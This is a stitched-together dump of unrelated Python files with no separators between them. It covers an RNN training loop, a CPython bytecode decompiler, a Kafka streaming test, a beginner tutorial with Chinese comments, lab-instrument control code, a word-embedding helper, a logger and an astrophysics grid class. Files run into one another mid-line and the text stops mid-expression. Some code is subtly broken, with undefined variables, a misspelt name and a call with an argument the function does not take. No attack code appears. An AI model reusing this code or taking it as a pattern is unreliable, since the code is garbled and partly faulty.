nn.SmoothL1Loss() train_losses_RNN = [] def Train_RNN(): running_loss = .0 model_RNN.train() for idx, (inputs,labels) in enumerate(train_loader): inputs = inputs.to(device) labels = labels.float().to(device) optimizer.zero_grad() preds = model_RNN(inputs.float()) loss = criterion(preds,labels) loss.backward() optimizer.step() running_loss += loss train_loss = running_loss/len(train_loader) train_losses_RNN.append(train_loss.detach().cpu().numpy()) print(f'train_loss {train_loss}') test_losses_RNN = [] def Test_RNN(): running_loss = .0 model_RNN.eval() with torch.no_grad(): for idx, (inputs, labels) in enumerate(test_loader): inputs = inputs.to(device) labels = labels.to(device) optimizer.zero_grad() preds = model_RNN(inputs.float()) loss = criterion(preds,labels) running_loss += loss test_loss = running_loss/len(test_loader) test_losses_RNN.append(test_loss.detach().cpu().numpy()) print(f'test_loss {test_loss}') epochs = 300 for epoch in range(epochs): print('epochs {}/{}'.format(epoch+1,epochs)) Train_RNN() Test_RNN() #Plot the results fig, ax = plt.subplots(figsize = (10, 8)) color = "tab:blue" ax.plot(range(len(train_losses_RNN)), train_losses_RNN, color = color, label = "train loss") color = "tab:red" ax.plot(range(len(test_losses_RNN)), test_losses_RNN, color = color, label = "test loss") 
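# (illustrative aside) The RNN whose losses are plotted here uses batch_first=True, so each
# batch has shape (batch, seq_len, input_dim) and the initial hidden state h0 has shape
# (layer_dim, batch, hidden_dim). A quick standalone shape check of that convention, with
# hypothetical tensors that are not part of the original pipeline:
_example_rnn = nn.RNN(input_size=11, hidden_size=100, num_layers=1,
                      batch_first=True, nonlinearity='relu')
_example_out, _example_hn = _example_rnn(torch.zeros(10, 2, 11),
                                         torch.zeros(1, 10, 100))
# _example_out has shape (10, 2, 100); slicing out[:, -1, :] keeps only the last time step,
# which is what the fc layer of the RNN above consumes.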
legend = ax.legend(loc='upper right', shadow=True, fontsize='x-large') ax.set_xlabel("Epochs") ax.set_ylabel("Losses") plt.show src/optimizer/decompiler.py from opcode import opname from types import CodeType from typing import List, Tuple, Union from structures import * def find_n_values_on_stack(codes: bytes, index: int) -> int: if "grow" not in dir(find_n_values_on_stack): find_n_values_on_stack.grow = { 135: lambda oparg: 1, 124: lambda oparg: 1, 100: lambda oparg: 1, 71: lambda oparg: 1, 92: lambda oparg: oparg - 1, 94: lambda oparg: (oparg & 0xFF == 0xFF) + (oparg >> 8), 101: lambda oparg: 1, 116: lambda oparg: 1, 148: lambda oparg: 1, 136: lambda oparg: 1, 109: lambda oparg: 1, 160: lambda oparg: 1, } if "shrink" not in dir(find_n_values_on_stack): find_n_values_on_stack.shrink = { 125: lambda oparg: 1, 1: lambda oparg: 1, 19: lambda oparg: 1, 20: lambda oparg: 1, 16: lambda oparg: 1, 27: lambda oparg: 1, 26: lambda oparg: 1, 22: lambda oparg: 1, 23: lambda oparg: 1, 24: lambda oparg: 1, 25: lambda oparg: 1, 62: lambda oparg: 1, 63: lambda oparg: 1, 64: lambda oparg: 1, 65: lambda oparg: 1, 66: lambda oparg: 1, 145: lambda oparg: 1, 146: lambda oparg: 1, 67: lambda oparg: 1, 57: lambda oparg: 1, 17: lambda oparg: 1, 29: lambda oparg: 1, 28: lambda oparg: 1, 59: lambda oparg: 1, 55: lambda oparg: 1, 56: lambda oparg: 1, 75: lambda oparg: 1, 76: lambda oparg: 1, 77: lambda oparg: 1, 78: lambda oparg: 1, 79: lambda oparg: 1, 70: lambda oparg: 1, 130: lambda oparg: oparg, 83: lambda oparg: 1, 72: lambda oparg: 1, 86: lambda oparg: 1, 89: lambda oparg: 3, 90: lambda oparg: 1, 95: lambda oparg: 2, 96: lambda oparg: 1, 97: lambda oparg: 1, 137: lambda oparg: 1, 157: lambda oparg: oparg - 1, 102: lambda oparg: oparg - 1, 103: lambda oparg: oparg - 1, 104: lambda oparg: oparg - 1, 105: lambda oparg: oparg * 2 - 1, 156: lambda oparg: oparg, 147: lambda oparg: 2, 107: lambda oparg: 1, 108: lambda oparg: 1, 84: lambda oparg: 1, 114: lambda oparg: 1, 115: lambda oparg: 1, 161: lambda oparg: oparg + 1, 131: lambda oparg: oparg, 141: lambda oparg: oparg + 1, 142: lambda oparg: ((oparg & 0x01) == 0x01) + 1, 132: lambda oparg: ((oparg & 0x08) == 0x08) + ((oparg & 0x04) == 0x04) + ((oparg & 0x02) == 0x02) + ((oparg & 0x01) == 0x01), 133: lambda oparg: (oparg == 3) + 1, 155: lambda oparg: ((oparg & 0x04) == 0x04), } if "unsupported" not in dir(find_n_values_on_stack): find_n_values_on_stack.unsupported = [ # This stuff normally requires reading the stack during runtime 111, 112, 52, 50, 51, 54 ] if "values_needed" not in dir(find_n_values_on_stack): find_n_values_on_stack.values_needed = { 9: lambda oparg: 0, 135: lambda oparg: 0, 124: lambda oparg: 0, 100: lambda oparg: 0, 125: lambda oparg: 1, 1: lambda oparg: 1, 2: lambda oparg: 2, 3: lambda oparg: 3, 6: lambda oparg: 4, 4: lambda oparg: 1, 5: lambda oparg: 2, 10: lambda oparg: 1, 11: lambda oparg: 1, 12: lambda oparg: 1, 15: lambda oparg: 1, 19: lambda oparg: 2, 20: lambda oparg: 2, 16: lambda oparg: 2, 27: lambda oparg: 2, 26: lambda oparg: 2, 22: lambda oparg: 2, 23: lambda oparg: 2, 24: lambda oparg: 2, 25: lambda oparg: 2, 62: lambda oparg: 2, 63: lambda oparg: 2, 64: lambda oparg: 2, 65: lambda oparg: 2, 66: lambda oparg: 2, 145: lambda oparg: 1, 146: lambda oparg: 1, 67: lambda oparg: 2, 57: lambda oparg: 2, 17: lambda oparg: 2, 29: lambda oparg: 2, 28: lambda oparg: 2, 59: lambda oparg: 2, 55: lambda oparg: 2, 56: lambda oparg: 2, 75: lambda oparg: 2, 76: lambda oparg: 2, 77: lambda oparg: 2, 78: lambda oparg: 2, 79: lambda oparg: 2, 60: 
lambda oparg: 3, 61: lambda oparg: 2, 70: lambda oparg: 1, 130: lambda oparg: oparg, 83: lambda oparg: 1, 50: lambda oparg: 1, 51: lambda oparg: 1, 73: lambda oparg: 1, 72: lambda oparg: 2, 86: lambda oparg: 1, 89: lambda oparg: 3, # 54: lambda oparg: 3 or 4, # stack inspection needed 71: lambda oparg: 0, 90: lambda oparg: 1, 91: lambda oparg: 0, 92: lambda oparg: 1, 94: lambda oparg: 1, 95: lambda oparg: 2, 96: lambda oparg: 1, 97: lambda oparg: 1, 98: lambda oparg: 0, 101: lambda oparg: 0, 116: lambda oparg: 0, 126: lambda oparg: 0, 138: lambda oparg: 0, 148: lambda oparg: 0, 136: lambda oparg: 0, 137: lambda oparg: 1, 157: lambda oparg: oparg, 102: lambda oparg: oparg, 103: lambda oparg: oparg, 104: lambda oparg: oparg, 105: lambda oparg: oparg * 2, 85: lambda oparg: 0, 156: lambda oparg: oparg + 1, 147: lambda oparg: oparg + 2, 106: lambda oparg: 1, 107: lambda oparg: 2, 108: lambda oparg: 2, 84: lambda oparg: 1, 109: lambda oparg: 1, 110: lambda oparg: 0, 114: lambda oparg: 1, 115: lambda oparg: 1, 111: lambda oparg: 1, 112: lambda oparg: 1, 113: lambda oparg: 0, 68: lambda oparg: 1, 69: lambda oparg: 1, 93: lambda oparg: 1, 52: lambda oparg: 1, 160: lambda oparg: 1, 161: lambda oparg: oparg + 2, 131: lambda oparg: oparg + 1, 141: lambda oparg: oparg + 2, 142: lambda oparg: 2 + ((oparg & 0x01) == 0x01), 132: lambda oparg: 1 + ((oparg & 0x08) == 0x08) + ((oparg & 0x04) == 0x04) + ((oparg & 0x02) == 0x02) + ((oparg & 0x01) == 0x01), 133: lambda oparg: 2 + (oparg == 3), 155: lambda oparg: 1 + ((oparg & 0x04) == 0x04), 144: lambda oparg: 0 } values_on_stack = 0 while index >= 0: wants = find_n_values_on_stack.values_needed[codes[index]](codes[index + 1]) if codes[index] in find_n_values_on_stack.grow: values_on_stack += find_n_values_on_stack.grow[codes[index]](codes[index + 1]) elif codes[index] in find_n_values_on_stack.shrink: values_on_stack -= find_n_values_on_stack.shrink[codes[index]](codes[index + 1]) elif codes[index] in find_n_values_on_stack.unsupported: raise NotImplementedError(f"Cannot support {opname[codes[index]]} ({codes[index]}) yet") if values_on_stack >= wants: break index -= 2 return index def build_tree(codes: bytes, start_index: int = 0, stop_index: int = -1) -> Union[Body, Tuple[Body, int]]: main_instructs = Body(list()) data = Segment(list()) def find_contitional(index: int) -> int: # Returns the start index return find_n_values_on_stack(codes, index) def branch(index: int, opcode: int, oparg: int, true_first: bool) -> int: if data.instructions.__len__(): if main_instructs.content.__len__() and isinstance(main_instructs.content[-1], Segment): main_instructs.content[-1].instructions.extend(data.instructions) else: main_instructs.content.append(Segment(data.instructions)) data.instructions = [] split_on = int(find_contitional(index) / 2) values: Segment = main_instructs.content[-1] first_value_index = values.instructions[0].id condition = Segment(values.instructions[split_on - int(first_value_index / 2):int((index - first_value_index) / 2)]) values.instructions = values.instructions[:split_on - int(first_value_index / 2)] if not values.instructions.__len__(): del main_instructs.content[-1] true = build_tree(codes, index + 2, oparg) if isinstance(true, Tuple): true = true[0] if true.content.__len__() and isinstance(true.content[-1], Segment) and true.content[-1].instructions.__len__(): possible_jump: Instruction = true.content[-1].instructions[-1] if (possible_jump.opcode == 113 and possible_jump.oparg == condition[0].id): 
main_instructs.content.append(While(condition, true, Instruction(codes[index], codes[index + 1], index))) return oparg - index if possible_jump.opcode == 110: false = build_tree(codes, oparg, possible_jump.id + possible_jump.oparg + 2) if isinstance(false, Tuple): false_move = false[1] false = false[0] main_instructs.content.append(Branch(condition, true, false, Instruction(codes[index], codes[index + 1], index), true_first)) return (oparg - index) + false_move main_instructs.content.append(If(condition, true, Instruction(codes[index], codes[index + 1], index), true_first)) return oparg - index def for_iter(index: int, opcode: int, oparg: int) -> int: if len(data.instructions): main_instructs.content.append(Segment(data.instructions)) data.instructions = [] split_on = int(find_contitional(index) / 2) values: Segment = main_instructs.content[-1] first_value_index = values.instructions[0].id condition = values.instructions[split_on - int(first_value_index / 2):int((index - first_value_index) / 2)] values.instructions = values.instructions[:split_on - first_value_index] if not values.instructions.__len__(): del main_instructs.content[-1] loop = build_tree(codes, index + 2, index + 2 + oparg)[0] main_instructs.content.append(For(condition, loop, Instruction(opcode, oparg, index))) return oparg + 2 def jump_forward(index: int, opcode: int, oparg: int) -> int: data.instructions.append(Instruction(opcode, oparg, index)) return oparg def default(index: int, opcode: int, oparg: int) -> int: data.instructions.append(Instruction(opcode, oparg, index)) return 2 def search(index: int) -> int: i = index while index < codes.__len__() and (stop_index == -1 or index < stop_index): opcode, oparg = codes[index:index + 2] if opcode in (114, 115): index += branch(index, opcode, oparg, opcode == 114) elif opcode in (110,): index += jump_forward(index, opcode, oparg) break elif opcode in (93,): index += for_iter(index, opcode, oparg) elif opcode in (83,): index += default(index, opcode, oparg) break else: index += default(index, opcode, oparg) return index - i total_move = search(start_index) if len(data.instructions): main_instructs.content.append(data) if total_move < len(codes): if total_move + 4 == len(codes): instructions = [Instruction(100, 0, total_move), Instruction(83, 0, total_move + 2)] if isinstance(main_instructs.content[-1], Segment): main_instructs.content[-1].instructions.extend(instructions) else: main_instructs.content.append(Segment(instructions)) return main_instructs return (main_instructs, total_move) else: return main_instructs def test(obj: object, display_bytes: bool = False): codes = obj.__code__.co_code if display_bytes: seg = Segment(list()) for i in range(0, len(codes), 2): seg.instructions.append(Instruction(codes[i], codes[i + 1], i)) print(Body([seg]).display()) tree = build_tree(codes) print("\nDISPLAYING TREE\n") try: print(tree.display()) except AttributeError: print("Hit on", tree[1]) print("FAIL FAIL FAIL FAIL FAIL FAIL FAIL FAIL FAIL FAIL FAIL FAIL FAIL FAIL FAIL FAIL FAIL FAIL") print(tree[0].display()) print("FAIL FAIL FAIL FAIL FAIL FAIL FAIL FAIL FAIL FAIL FAIL FAIL FAIL FAIL FAIL FAIL FAIL FAIL") # Decompiles a CodeType to only its instructions def decompile_instructions_to_str(obj: CodeType) -> str: output_str = "" if hasattr(obj, "co_code"): codes = obj.co_code longest_instruction_name = len(opname[max(codes[::2], key = lambda code: len(opname[code]))]) longest_instruction_code = len(str(max(codes[::2]))) longest_argument = len(str(max(codes[1::2]))) 
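# (illustrative aside) Since CPython 3.6, co_code is a flat sequence of 2-byte units: an
# opcode at every even offset followed by its argument byte, which is why codes[::2] and
# codes[1::2] above slice out the opcodes and opargs. A minimal standalone dump built on the
# same idea (hypothetical helper, not used elsewhere in this module):
def _dump_code_units(code_obj):
    units = code_obj.co_code
    for offset in range(0, len(units), 2):
        op, arg = units[offset], units[offset + 1]
        print(f"{offset:>4} {opname[op]:<20} {arg}")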
longest_instruction_number = len(str(len(codes))) for i in range(0, len(codes), 2): instruction = codes[i] output_str += f"{i:<{longest_instruction_number}} {instruction:<{longest_instruction_code}} {codes[i + 1]:<{longest_argument}} - {opname[instruction]}" if instruction in (100, 90, 101, 97, 125, 124, 116): output_str += " " * (longest_instruction_name - len(opname[instruction]) + 1) if instruction == 100 and hasattr(obj, "co_consts"): const_load_value = obj.co_consts[codes[i + 1]] if hasattr(const_load_value, "co_code"): const_name = const_load_value.co_name const_type = "Code" else: const_name = str(obj.co_consts[codes[i + 1]]) const_type = type(obj.co_consts[codes[i + 1]]).__name__ output_str += f" {const_name} ({const_type})" elif instruction in (90, 101, 116, 97): names_name = obj.co_names[codes[i + 1]] output_str += f" \"{names_name}\"" elif instruction in (125, 124): names_name = obj.co_varnames[codes[i + 1]] output_str += f" \"{names_name}\"" output_str += "\n" output_str += "\n" return output_str.rstrip("\n") # Decompiles, recursively, a CodeType def decompile_to_str(obj: CodeType, headers = None) -> str: output_str = "" if hasattr(obj, "co_consts"): consts = list(obj.co_consts) if headers is None: next_headers = [obj.co_name] else: next_headers = headers + [obj.co_name] disassemblable = [] for i in range(len(consts)): const = consts[i] if hasattr(const, "co_code"): disassemblable.append(i) consts[i] = f"{const.co_name} (Code)" else: consts[i] = f"{str(const)} ({type(const).__name__})" for i in disassemblable: decompile_to_str(consts[i], next_headers) if hasattr(obj, "co_code"): if type(headers) is not list: output_str += f"Disassemble of: {obj.co_name}\n" else: output_str += "Disassemble of:" + " -> ".join(headers) + f"->{obj.co_name}\n" if len(consts): output_str += "Consts\n\t" + "\n\t".join(consts) + "\n\n" if hasattr(obj, "co_varnames") and len(obj.co_varnames): output_str += "Vars\n\t" + "\n\t".join(obj.co_varnames) + "\n\n" if hasattr(obj, "co_freevars") and len(obj.co_freevars): output_str += "Frees\n\t" + "\n\t".join(obj.co_freevars) + "\n\n" if hasattr(obj, "co_cellvars") and len(obj.co_cellvars): output_str += "Cells\n\t" + "\n\t".join(obj.co_cellvars) + "\n\n" if hasattr(obj, "co_names") and len(obj.co_names): output_str += "Names\n\t" + "\n\t".join(obj.co_names) + "\n\n" output_str += decompile_instructions_to_str(obj) return output_str.rstrip("\n") # Decompiles 'codes' (CodeType's) def decompile(obj: CodeType, /, instructions_only: bool = False) -> str: print(decompile_instructions_to_str(obj) if instructions_only else decompile_to_str(obj)) # Creates a side by side of the code and bytecodes def generate_side_by_side(source_code: List[str], wrap: bool = False) -> str: if wrap: compiled_source = compile("def __anon__():\n\t" + "\n\t".join(source_code), "", "exec") compiled_source = compiled_source.co_consts[0] else: compiled_source = compile("\n".join(source_code), "", "exec") decompiled = decompile_instructions_to_str(compiled_source).split("\n") longest_source_code_line = len(max(source_code, key = lambda code: len(code))) + 1 output_str = "" i = 0 for src_code_line, decompiled_line in zip(source_code, decompiled): output_str += f"{src_code_line:<{longest_source_code_line}}# {decompiled_line}\n" i += 1 if i < len(decompiled): while i < len(decompiled): output_str += f"{' ':<{longest_source_code_line}}# {decompiled[i]}\n" i += 1 elif i < len(source_code): while i < len(source_code): output_str += f"{source_code[i]}\n" i += 1 return output_str.rstrip() if __name__ 
== "__main__": def test_1(): a = 100 if not a >= 50: return 1 else: return 2 def test_2(): a = 100 b = 200 if a >= 50: if b >= 150: return 1 else: return 2 else: return 3 def test_3(): a = 50 b = 100 if a >= 25: return 1 elif a >= 50: return 2 elif b >= 125: return 3 elif b >= 100: return 4 else: return 5 def test_4(): a = 500 b = 300 if a >= 500: if b >= 800: return 0 elif b >= 200: return 1 else: return 2 elif a >= 300: if b >= 800: return 3 elif b >= 200: return 4 else: return 5 else: if b >= 800: return 6 elif b >= 200: return 7 else: return 8 def test_5(): a = 1 b = 2 if a > 3 or b < 4: return 1 else: return 2 def test_6(): pass def test_7(values: List): total = 0 for i in values: total += i return total def test_8(): total = 0 for i in range(8): total += i return total def test_9(): total = 0 i = 0 while i < 10: i += 1 total += i while i < 10: i += 1 total += i return total def test_10(values: List): total = 0 for i in values: for j in values: for l in values: total += l total += j total += i return total def test_11(): a = 50 if a >= 25: a = 100 # Will have return or jump instruction if there's an else/elif else: a = 200 if a >= 50: a = 200 if a >= 75: a = 200 a = 300 else: a = 400 a = 500 return a def test_12(): def test_12_internal(): b = 20 if b > 5: b = 50 while b > 90: b -= 2 return b a = 60 c = 20 our_b = test_12_internal() if a == c or (our_b == 2 and our_b == 3): return 2 test(test_12, True)OMR5221/spark_delta_dockerpyspark_examples/kafka_stream_test.py # Subscribe to 1 topic from pyspark.sql import SparkSession spark = SparkSession.builder.appName("stream").getOrCreate() dsraw = spark.readStream.format("kafka").option("kafka.bootstrap.servers", "localhost:9092").option("subscribe", "queueing.transactions").load() ds = dsraw.selectExpr("CAST(key AS STRING)") print(type(dsraw)) print(type(ds)) rawQuery = dsraw \ .writeStream \ .queryName("qraw")\ .format("memory")\ .start() raw = spark.sql("select * from qraw") raw.show() #!/usr/bin/env python # -*- coding:utf-8 -*- # List Weekday = ['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday'] print(Weekday[0]) ## List正负索引的使用 periodic_table = ['H','He','Li','Be','B','C','N','O','F','Ne'] print(periodic_table[0]) print(periodic_table[-2]) print(periodic_table[0:3]) print(periodic_table[-10:-7]) print(periodic_table[-10:]) print(periodic_table[:9]) # 字典Dictonary ## 字典的特征 # 1. 字典中数据必须是以键值对的形式出现的 # 2. 逻辑上讲,键是不能重复的,而值可以重复 # 3. 
字典中的键(key)是不可改变的,也就是无法修改的;而值(value),是可改变的,可修改的,可以是任何对象 # 注意:字典不能够进行切片 NASDAQ_CODE = { 'BIDU': 'Baidu', 'SINA':'Sina', 'YOKU': 'Youku' } print(NASDAQ_CODE) a = {'key' : 123, 'key' : 123} print(a) NASDAQ_CODE.update({'FB': 'FaceBook', 'TSLA': 'Tesla'}) print(NASDAQ_CODE) del NASDAQ_CODE['FB'] print(NASDAQ_CODE) ## 元组 letters = ('a', 'b', 'c', 'd', 'e', 'f', 'g') print(letters[0]) # 集合 a_set = {1,2,3,4} a_set.add(5) a_set.discard(5) print(a_set)#!/usr/bin/python import pyNetIO as lower_IO import time from General_tools import * SCALA_root = "/home/scala1/SCALA/" INPUT_data = SCALA_root+"SCALA_library/INPUTS/" ######################### # --------------------- # # - TEST & CONNEXION - # # --------------------- # ######################### def Status_Test(Bool, message=""): """ """ print "".center(70,"*") if Bool: print "Status - Ok" print message else: print "Status - Problem" print message print "".center(70,"*") ######################### # --------------------- # # - SCALA - # # --------------------- # ######################### Error_status_Scala = 1 SCALA_max_loading_time = 30 # in second SCALA_channel = "0" SCALA_fclass = "000" SCALA_xfclass = "000" SCALA_prod = "00-00" def assign_prod_name(): """ """ loc = time.localtime() year = str(loc.tm_year)[-2:] day = str(loc.tm_yday) obsnum = '001' runnum = '001' savefile= "Default_SCALA_fitsfile" #savefile = "%s_%s_%s_%s_%d_%s_%s_00-000.fits"%(year,day,obsnum,runnum, # SCALA_channel,SCALA_fclass,SCALA_xfclass, # ) return savefile ######################### # --------------------- # # - MONOCHROMATOR - # # --------------------- # ######################### Error_status_Mono = 2 SCALA_COMPUTER_IP = "172.16.58.3"#"192.168.127.12" SCALA_netmask = "255.255.255.224" # ------------------- # # - Serial_function - # # ------------------- # Serial_port = '/dev/ttyUSB0' # windows: 'COMx', Linux: '/dev/' Serial_baud = 9600 # -- Times took by _load_current_status_ -- # IO_timer_max_loading = 20 # in Second ######################### # --------------------- # # - CLAPS - # # --------------------- # ######################### Error_status_clap = 3 IO_timer_max_loading_Clap = 20 # ------------------- # # - Earth location - # # ------------------- # Line_frequency = 60 # must be 50/60 in the EU/US ######################### # --------------------- # # - Lamp Switch - # # --------------------- # ######################### Error_status_Xe = 5 Error_status_Halo = 6 Serial_port_lampSwitch = '/dev/ttyACM0' baud_lampSwtich = 9600 ######################### # --------------------- # # - NET I/O - # # --------------------- # ######################### Error_status_NetIO = 6 switch_max_time = 5 NET_IO_port = '/dev/ttyUSB1' NET_IO_port_backup = '/dev/ttyUSB2' NET_IO_order= 'MonoChromator,XeLamp,HaloLamp,Claps' class IO_scala(lower_IO.NetIO): """ """ def __init__(self,SerPort=None,verbose=True): """ """ if SerPort is None: SerPort = NET_IO_port lower_IO.NetIO.__init__(self,SerPort=SerPort,SerPort_backup=NET_IO_port_backup) self.verbose= verbose ########################################### # MonoChromator # ########################################### @timeout(switch_max_time,Error_status_NetIO) def Is_MonoChrometor_on(self): """ """ print "Is Mono On ?" 
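# (illustrative aside) The state check below is read twice with a short pause because the
# NetIO box occasionally reports a spurious "off". The same debounce pattern, factored out
# with hypothetical names (not part of this module), would look like:
def _read_port_debounced(read_ports, port_index, retries=2, delay=0.2):
    """Return True if the port reads '1' within `retries` attempts."""
    for _ in range(retries):
        if read_ports()[port_index] == "1":
            return True
        time.sleep(delay)
    return False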
if self.GetPortList()[0] == "1": return True time.sleep(0.2) # Sometimes they False negatives happend if self.GetPortList()[0] == "1": return True return False @timeout(switch_max_time,Error_status_NetIO) def switch_MonoChrometor_on(self,wait_for_it=False): """ """ if self.Is_MonoChrometor_on(): return "Was on" if self.SetPortState(PortNr=1, State=1) == "OK": if self.verbose: print "SCALA.IO : The MonoChromator supply is On. Please wait 3 second for it to wake up" if wait_for_it: time.sleep(3) @timeout(switch_max_time,Error_status_NetIO) def switch_MonoChrometor_off(self): """ """ if self.Is_MonoChrometor_on(): if self.SetPortState(PortNr=1, State=0) == "OK": if self.verbose: print "SCALA.IO : The MonoChromator supply is now Off" else: raise ValueError("SCALA.IO : I've *FAILED* switching off the MonoChromator" ) else: if self.verbose: print "SCALA.IO : The MonoChromator was already Off" ########################################### # Xenon Lamp # ########################################### @timeout(switch_max_time,Error_status_NetIO) def Is_XeLamp_on(self): """ """ print "Is XeLamp On ?" if self.GetPortList()[1] == "1": return True time.sleep(0.2) # Sometimes they False negatives happend if self.GetPortList()[1] == "1": return True return False @timeout(switch_max_time,Error_status_NetIO) def switch_XeLamp_on(self): """ """ if self.Is_XeLamp_on(): return "Was on" if self.SetPortState(PortNr=2, State=1) == "OK": if self.verbose: print "SCALA.IO : The XeLamp supply is On. You should wait for the lamp to warm up (not forced here)" @timeout(switch_max_time,Error_status_NetIO) def switch_XeLamp_off(self): """ """ if self.Is_XeLamp_on(): if self.SetPortState(PortNr=2, State=0) == "OK": if self.verbose: print "SCALA.IO : The Xenon Lamp supply is now Off" else: raise ValueError("SCALA.IO : I've *FAILED* switching off the Xenon Lamp" ) else: if self.verbose: print "SCALA.IO : The Xenon Lamp was already Off" ########################################### # Halogen Lamp # ########################################### @timeout(switch_max_time,Error_status_NetIO) def Is_HaloLamp_on(self): """ """ print "Is Halo On ?" if self.GetPortList()[2] == "1": return True time.sleep(0.2) # Sometimes they False negatives happend if self.GetPortList()[2] == "1": return True return False def switch_HaloLamp_on(self): """ """ try: self._switch_HaloLamp_on_() except: try: [self.GetPortList() for i in range(3)] self.SetPortList('1111') except: sys.exit(Error_status_NetIO) def switch_HaloLamp_off(self): """ """ try: self._switch_HaloLamp_off_() except: try: [self.GetPortList() for i in range(3)] self.SetPortList('1101') except: sys.exit(Error_status_NetIO) @timeout(switch_max_time,Error_status_NetIO) def _switch_HaloLamp_on_(self): """ """ if self.Is_HaloLamp_on(): return "Was on" if self.SetPortState(PortNr=3, State=1) == "OK": if self.verbose: print "SCALA.IO : The Halo Lamp supply is On. 
You should wait for the lamp to warm up (not forced here)" @timeout(switch_max_time*2,Error_status_NetIO) def _switch_HaloLamp_off_(self,try_again=True): """ """ if self.Is_HaloLamp_on(): if self.SetPortState(PortNr=3, State=0) == "OK": if self.verbose: print "SCALA.IO : The Halo Lamp supply is now Off" else: try: time.sleep(2) self.switch_HaloLamp_off(try_again=False) except: raise ValueError("SCALA.IO : I've *FAILED* switching off the Halo Lamp" ) else: if self.verbose: print "SCALA.IO : The Halo Lamp was already Off" ########################################### # CLAPS # ########################################### @timeout(switch_max_time*3,Error_status_NetIO) def Is_CLAPS_on(self,try_again=True): """ """ print "Is Clap On ?" if self.GetPortList()[3] == "1": return True # Sometimes they False negatives happend time.sleep(0.2) if self.GetPortList()[3] == "1": return True time.sleep(1) self.GetPortList() self.Is_CLAPS_on(try_again=False) return False @timeout(switch_max_time,Error_status_NetIO) def switch_CLAPS_on(self): """ """ if self.Is_CLAPS_on(): return "Was on" if self.SetPortState(PortNr=4, State=1) == "OK": if self.verbose: print "SCALA.IO : The CLAPS supply is now On. Ready to go" @timeout(switch_max_time,Error_status_NetIO) def switch_CLAPS_off(self): """ """ if self.Is_CLAPS_on(): if self.SetPortState(PortNr=4, State=0) == "OK": if self.verbose: print "SCALA.IO : The CLAPS supply is now Off" else: raise ValueError("SCALA.IO : I've *FAILED* switching off the CLAPS" ) else: if self.verbose: print "SCALA.IO : The CLAPS were already Off" # ------------------------ # """This module generates company embeddings given company data and pre-trained word embeddings""" import csv from collections import defaultdict import numpy as np class Embeddings: """ Helper class for embeddings """ def __init__(self): self.embeddings = self.read_glove_embeddings() self.embedding_size = len(self.embeddings['the']) @classmethod def read_glove_embeddings(cls): """ Class method to read in embeddings :return: embeddings: dictionary of embeddings, key:word, value:embedding """ embeddings = defaultdict(list) with open('app/data/glove.6B.50d.txt', encoding="utf-8") as csvfile: spamreader = csv.reader(csvfile, delimiter=' ', quoting=csv.QUOTE_NONE) for row in spamreader: embeddings[row[0]] = row[1:] return embeddings def create_single_embedding(self, company_data): """ Create single embedding for company :param company_name: company name string :return: company_embedding: embedding for single company, numpy array """ # # reading company text # scrape_file_location = 'app/scrape_output/' + company_name + '.json' # with open(scrape_file_location) as json_file: # data = json.load(json_file) company_text = ' '.join([ent['company_text'] for ent in company_data]) # generate embedding num_words = 0 company_embedding = np.zeros(shape=(1, self.embedding_size), dtype=np.float32) for word in company_text.split(): try: company_embedding += np.array(self.embeddings[word], dtype=np.float32) num_words += 1 except ValueError: continue # normalize array company_embedding_arr = company_embedding * (1/num_words) company_embedding_lst = company_embedding_arr.tolist()[0] # # remove scraped file # os.remove(scrape_file_location) return company_embedding_lst from .Console_Color import * from datetime import datetime class Printer: @staticmethod def _dolog(text): today = datetime.now().strftime("%d/%m/%Y %H:%M:%S") try: with open("log.txt","r") as f: log_txt = f.read() except: log_txt = "" with open("log.txt","w") as f: 
f.write(log_txt+"\n["+today+"]"+text) @staticmethod def stext(text): color = Console_Color("text").color print(color, text) @staticmethod def warning(text): color = Console_Color("warning").color print(color, "[Warning]", text) Printer.stext("") @staticmethod def error(text): color = Console_Color("error").color print(color, "[Error]", text) Printer.stext("") @staticmethod def log(text): #color = Console_Color("log").color Printer._dolog("[Log] "+str(text)) @staticmethod def info(text): #color = Console_Color("info").color Printer._dolog("[Info] "+str(text))# -*- coding: utf-8 -*- from numpy import * from mab.gd.gdfast import * import mab.gd.gdfast import pyublas import mab.gd.logging as logging logger = logging.getLogger("gd.schw.grid") class Grid2I_Block_Inside(object): def __init__(self, light_model, profile_model, logrmin, logrmax, n_I1, n_I2, dither=1, _issubgrid=False): self.light_model = light_model self.profile_model = profile_model self.logrmin = log10(light_model.arcsec_to_kpc(10**logrmin)) self.logrmax = log10(light_model.arcsec_to_kpc(10**logrmax)) self.n_I1 = n_I1 self.n_I2 = n_I2 self.logrs = (arange(0, n_I1,dtype=float)+0.5) / (n_I1) * (self.logrmax-self.logrmin) + self.logrmin self.logr_borders = (arange(0, n_I1+1,dtype=float)) / (n_I1) * (self.logrmax-self.logrmin) + self.logrmin self.Es = profile_model.potentialr(10**self.logrs) self.E_borders = profile_model.potentialr(10**self.logr_borders) epsilon = 0.0001 self.ls = (arange(0, n_I2, dtype=float)+0.5)/n_I2 * (1-2*epsilon) + epsilon self.l_borders = (arange(0, n_I2+1, dtype=float))/n_I2 * (1-2*epsilon) + epsilon self.dither = dither self.n_orbits = self.n_I1 * self.n_I2 self.dof_per_cell = 1 self.dof = self.n_orbits if not _issubgrid: self.subgrid = Grid2I_Block_Inside(light_model, profile_model, logrmin, logrmax, n_I1*dither, n_I2*dither, dither=1, _issubgrid=True) else: self.subgrid = None def basis(self, i, u, v): return 1 def index_to_dof(self, xi, yi, i): return i1*self.n_I2 + i2 def solve_coordinates(self, inner_products): # system is orthogonal, so inner products are the coordinates themselves return inner_products * 1.0 def index_to_orbitnr(self, i1, i2, i3): assert i3 == 0 return i1*self.n_I2 + i2 def __call__(self, coordinates, logr, l): return self.mesh.eval(coorinates, logr, l) class Grid2I_Shaped_Inside(object): def __init__(self, light_model, profile_model, logrmin, logrmax, n_I1, n_I2, dither=1, order=0, _issubgrid=False, circular=False): self.light_model = light_model self.profile_model = profile_model self.umin = self.logrmin = log10(light_model.arcsec_to_kpc(10**logrmin)) self.umax = self.logrmax = log10(light_model.arcsec_to_kpc(10**logrmax)) #import pdb #pdb.set_trace() logger.debug("rmin: %s kpc rmax: %s kpc" % (light_model.arcsec_to_kpc(10**logrmin), light_model.arcsec_to_kpc(10**logrmax))) self.n_I1 = n_I1 self.n_I2 = n_I2 self.logrs = (arange(0, n_I1,dtype=float)+0.5) / (n_I1) * (self.logrmax-self.logrmin) + self.logrmin self.logr_borders = (arange(0, n_I1+1,dtype=float)) / (n_I1) * 